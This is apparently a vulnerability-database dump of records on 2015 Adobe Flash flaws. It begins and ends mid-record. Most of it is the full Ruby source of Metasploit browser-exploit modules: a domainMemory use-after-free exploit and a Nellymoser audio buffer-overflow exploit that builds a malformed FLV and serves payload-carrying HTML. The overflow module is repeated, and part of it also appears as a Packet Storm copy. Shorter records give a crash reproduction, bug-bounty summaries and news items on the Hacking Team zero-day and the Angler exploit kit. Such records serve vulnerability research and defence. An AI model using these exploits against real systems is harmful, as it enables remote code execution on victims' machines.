\nheader << [1].pack('C') # version \nheader << [4].pack('C') # Flags: TypeFlagsAudio \nheader << [9].pack('N') # DataOffset \n \ndata = '' \ndata << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 \ndata << \"\\xee\" * 0x440 # SoundData \n \ntag1 = '' \ntag1 << [8].pack('C') # TagType (audio) \ntag1 << \"\\x00\\x04\\x41\" # DataSize \ntag1 << \"\\x00\\x00\\x1a\" # TimeStamp \ntag1 << [0].pack('C') # TimeStampExtended \ntag1 << \"\\x00\\x00\\x00\" # StreamID, always 0 \ntag1 << data \n \nbody = '' \nbody << [0].pack('N') # PreviousTagSize \nbody << tag1 \nbody << [0xeeeeeeee].pack('N') # PreviousTagSize \n \nflv = '' \nflv << header \nflv << body \n \nflv \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132525/adobe_flash_nellymoser_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-10-08T00:03:47", "description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. 
This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\n", "published": "2015-05-07T22:00:00", "type": "metasploit", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_DOMAIN_MEMORY_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\n 'Description' => %q{\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, when forcing a reallocation by copying more\n contents than the original capacity, but Flash forgets to update the domainMemory\n pointer, leading to a use-after-free situation when the main worker references the\n domainMemory again. 
This module has been tested successfully on Windows 7 SP1\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bilou', # Vulnerability discovery according to Flash Advisory\n 'Unknown', # Exploit in the wild\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-0359'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\n ['URL', 'https://git.hacklab.kr/snippets/13'],\n ['URL', 'http://pastebin.com/Wj3NViUu']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\n :arch => ARCH_X86\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-14',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + 
rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n platform_id = 'win'\n os_name = target_info[:os_name]\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb"}, {"lastseen": "2020-10-07T22:15:42", "description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. 
Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.\n", "published": "2015-07-01T18:13:57", "type": "metasploit", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043", "CVE-2015-3113"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. 
This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3043'],\n ['CVE', '2015-3113'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\n return true if ver =~ /^17\\./ && 
Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-06-23',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n @flv = create_flv\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n if request.uri =~ /\\.flv$/\n print_status('Sending FLV...')\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" 
value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\n def create_flv\n header = ''\n header << 'FLV' # signature\n header << [1].pack('C') # version\n header << [4].pack('C') # Flags: TypeFlagsAudio\n header << [9].pack('N') # DataOffset\n\n data = ''\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\n data << \"\\xee\" * 0x440 # SoundData\n\n tag1 = ''\n tag1 << [8].pack('C') # TagType (audio)\n tag1 << \"\\x00\\x04\\x41\" # DataSize\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\n tag1 << [0].pack('C') # TimeStampExtended\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\n tag1 << data\n\n body = ''\n body << [0].pack('N') # PreviousTagSize\n body << tag1\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\n\n flv = ''\n flv << header\n flv << body\n\n flv\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb"}, {"lastseen": "2021-01-09T14:38:02", "description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. 
This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.\n", "published": "2015-07-01T18:13:57", "type": "metasploit", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043", "CVE-2015-3113"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. 
This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3043'],\n ['CVE', '2015-3113'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\n return true if ver =~ /^17\\./ && 
Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-06-23',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n @flv = create_flv\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n if request.uri =~ /\\.flv$/\n print_status('Sending FLV...')\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" 
value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\n def create_flv\n header = ''\n header << 'FLV' # signature\n header << [1].pack('C') # version\n header << [4].pack('C') # Flags: TypeFlagsAudio\n header << [9].pack('N') # DataOffset\n\n data = ''\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\n data << \"\\xee\" * 0x440 # SoundData\n\n tag1 = ''\n tag1 << [8].pack('C') # TagType (audio)\n tag1 << \"\\x00\\x04\\x41\" # DataSize\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\n tag1 << [0].pack('C') # TimeStampExtended\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\n tag1 << data\n\n body = ''\n body << [0].pack('N') # PreviousTagSize\n body << tag1\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\n\n flv = ''\n flv << header\n flv << body\n\n flv\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash - Heap Buffer Overflow Loading .FLV File with Nellymoser Audio Codec", "edition": 1, "published": "2015-08-19T00:00:00", "title": "Adobe Flash - Heap Buffer Overflow Loading .FLV File with Nellymoser Audio Codec", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-08-19T00:00:00", "id": "EXPLOITPACK:D8E6122E0C3ED28050822787A838C525", "href": "", "sourceData": "Source: 
https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\n\nTo reproduce, host the attached files appropriately and:\n\nhttp://localhost/LoadMP4.swf?file=crash4000368.flv\n\nIf there is no crash at first, refresh the page a few times.\n\nWith a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:\n\n=> 0x00007f7789d081bb <__memmove_ssse3_back+443>:\tmovaps %xmm1,-0x10(%rdi)\n\nrdi 0x7f7778d69200\n\n7f777894b000-7f7778d69000 rw-p 00000000 00:00 0 \n7f7778d69000-7f7778d88000 ---p 00000000 00:00 0 \n\nThis looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.\n\nAlso, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37879.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-10-23T18:01:34", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2015-3044"], "description": "Some of the sandbox logic of Flash Player can be circumvented on most web browsers by using special URL schemes. A website can deploy an SWF file via the data: or blob: URL schemes (perhaps others). An app started in this way runs in the \"local with files\" or \"local with networking\" sandbox, depending on the SWF attributes. This bug can be used in conjunction other attacks such as the Firefox-specific bug reported separately or MITM (CVE-2015-3044) to promote the local sandbox to \"local trusted\". This would allow unlimited cross-domain access.\r\n\r\nOn Chrome, the SWF can simply be encoded in a data: URL. This doesn't appear to work on other browsers (maybe there is a limit on the URL length or something else). 
Firefox, Safari (recent versions, not version 5), and Chrome also allow loading the SWF from a blob: URL. On Firefox this apparently requires prefixing the URL with \"feed:\".\r\n\r\nThe vulnerability was patched in May 2015.\r\n", "modified": "2019-10-18T13:00:15", "published": "2015-06-30T14:33:56", "id": "H1:73276", "href": "https://hackerone.com/reports/73276", "type": "hackerone", "title": "Flash (IBB): Internet-based attacker can run Flash apps in local sandboxes by using special URL schemes (PSIRT-3299, CVE-2015-3079)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T18:01:35", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": [], "description": "The vulnerability allows a malicious Flash app on a website to read and write Local Shared Objects belonging to any website. As a special case, LSO's of macromedia.com contain global Flash settings. Overwriting them allows e.g. unlimited access to camera and microphone of the target user. Other attacks are possible too, e.g. disclosure of sensitive information in LSO's (website-dependent) and triggering the double free bug in Flash Player Settings Manager reported separately.\r\n\r\nThe bug can be exploited with malformed jar: URLs on Firefox. Other browsers require other ways of spoofing the host, e.g. HTTP MITM or DNS spoofing.\r\n\r\nThe bug was patched in April 2015, with additional hardening in May 2015.", "modified": "2019-10-18T13:00:00", "published": "2015-05-21T19:39:15", "id": "H1:63324", "href": "https://hackerone.com/reports/63324", "type": "hackerone", "title": "Flash (IBB): Flash Player information disclosure (etc.) 
CVE-2015-3044, PSIRT-3298", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-10-23T18:01:35", "bulletinFamily": "bugbounty", "bounty": 5000.0, "cvelist": [], "description": "This was patched by https://helpx.adobe.com/security/products/flash-player/apsb15-06.html , described as a \"double-free vulnerabilit[y] that could lead to code execution\".\r\n", "modified": "2019-10-18T12:59:20", "published": "2015-04-15T09:39:23", "id": "H1:56385", "href": "https://hackerone.com/reports/56385", "type": "hackerone", "title": "Flash (IBB): Double free vulnerability in Flash Player Settings Manager (CVE-2015-0346)", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:17:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-0349"], "description": "[](<https://1.bp.blogspot.com/-8wY-4N6x8oM/VZwCe65zOLI/AAAAAAAAjdY/XKMY5D3jbOA/s1600/flash-Player-zero-day-vulnerability.jpg>)\n\nThe Recent Cyber Attack that [exposed 400GB of corporate data](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) belonging to surveillance software firm Hacking Team has revealed that the spyware company have already discovered an exploit for an unpatched zero-day vulnerability in Flash Player.\n\n \n\n\nSecurity researchers at Trend Micro [claim](<http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>) that the leaked data stolen from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>), an Italian company that sells surveillance software to government agencies, contains a number of unpatched and unreported Adobe flaws.\n\n \n\n\n### Hacking Team has Unpatched Flash Bug \n\n \n\n\nWhile analyzing the leaked data dump, researchers discovered at least three software exploits \u2013 two for Adobe Flash Player and one for Microsoft's Windows kernel.\n\n \n\n\nOut of two, one of the Flash Player vulnerabilities, known as Use-after-free 
vulnerability with [CVE-2015-0349](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349>), has already been patched.\n\n \n\n\nHowever, the Hacking Team described the other Flash Player exploit, which is a zero-day exploit with no CVE number yet, as \"the most beautiful Flash bug for the last four years.\"\n\n \n\n\nSymantec has also [confirmed](<http://www.symantec.com/connect/blogs/leaked-flash-zero-day-likely-be-exploited-attackers>) the existence of the zero-day flaw in Adobe Flash that could allow hackers to remotely execute code on a targeted computer, actually allowing them to take full control of it.\n\n \n\n\nResearchers found Flash zero-day proof-of-concept (POC) exploit code that, after testing, successfully worked on the latest, fully patched version of Adobe Flash (version 18.0.0.194) with Internet Explorer.\n\n \n\n\nSuccessful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing a hacker to take complete control of the affected computer.\n\n \n\n\n### Zero-Day Flash Flaw Affects All Major Browsers\n\n \n\n\nThe zero-day vulnerability affects all major web browsers, including Microsoft's **Internet Explorer**, Google's **Chrome**, Mozilla's **Firefox** as well as Apple's **Safari**.\n\n \n\n\nResearchers have not spotted any attacks in the wild exploiting this zero-day flaw. 
However, since details of the vulnerability are now made publicly available, it is likely cybercriminals will quickly try to exploit the flaw before a patch is issued.\n\n \n\n\nTherefore, users who are concerned about the issue can temporarily disable the Adobe Flash Player in their browser until the company patches the zero-day flaw.\n", "modified": "2015-07-07T16:49:19", "published": "2015-07-07T05:49:00", "id": "THN:B74D1710436E41A0246F2D91A101DF62", "href": "https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html", "type": "thn", "title": "Zero-Day Flash Player Exploit Disclosed in 'Hacking Team' Data Dump", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:49", "bulletinFamily": "info", "cvelist": ["CVE-2015-0336", "CVE-2015-0359", "CVE-2015-3090"], "description": "While the Angler Exploit Kit may have already established itself as one of the more [sophisticated kits](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>) on the underground market, it appears it\u2019s still finding ways to evolve.\n\nAngler, this week, was spotted dropping the latest iteration of CryptoWall ransomware and leveraging yet another previously patched Adobe vulnerability.\n\nEarlier this year, the kit was spotted pushing a ransomware hybrid of sorts, [a cross between TeslaCrypt and AlphaCrypt](<https://threatpost.com/angler-exploit-kit-pushing-new-unnamed-ransomware/112751>), along with a handful of Adobe exploits, and instances of the [Bedep Trojan](<https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611>), which goes on to perpetrate click fraud.\n\nBrad Duncan, a handler at SANS Internet Storm Center claims he noticed two instances of Angler sending out Cryptowall 3.0 this week. In the first incident on Tuesday he spotted the kit dropping Bedep as a payload before it moved onto the CryptoWall 3.0. 
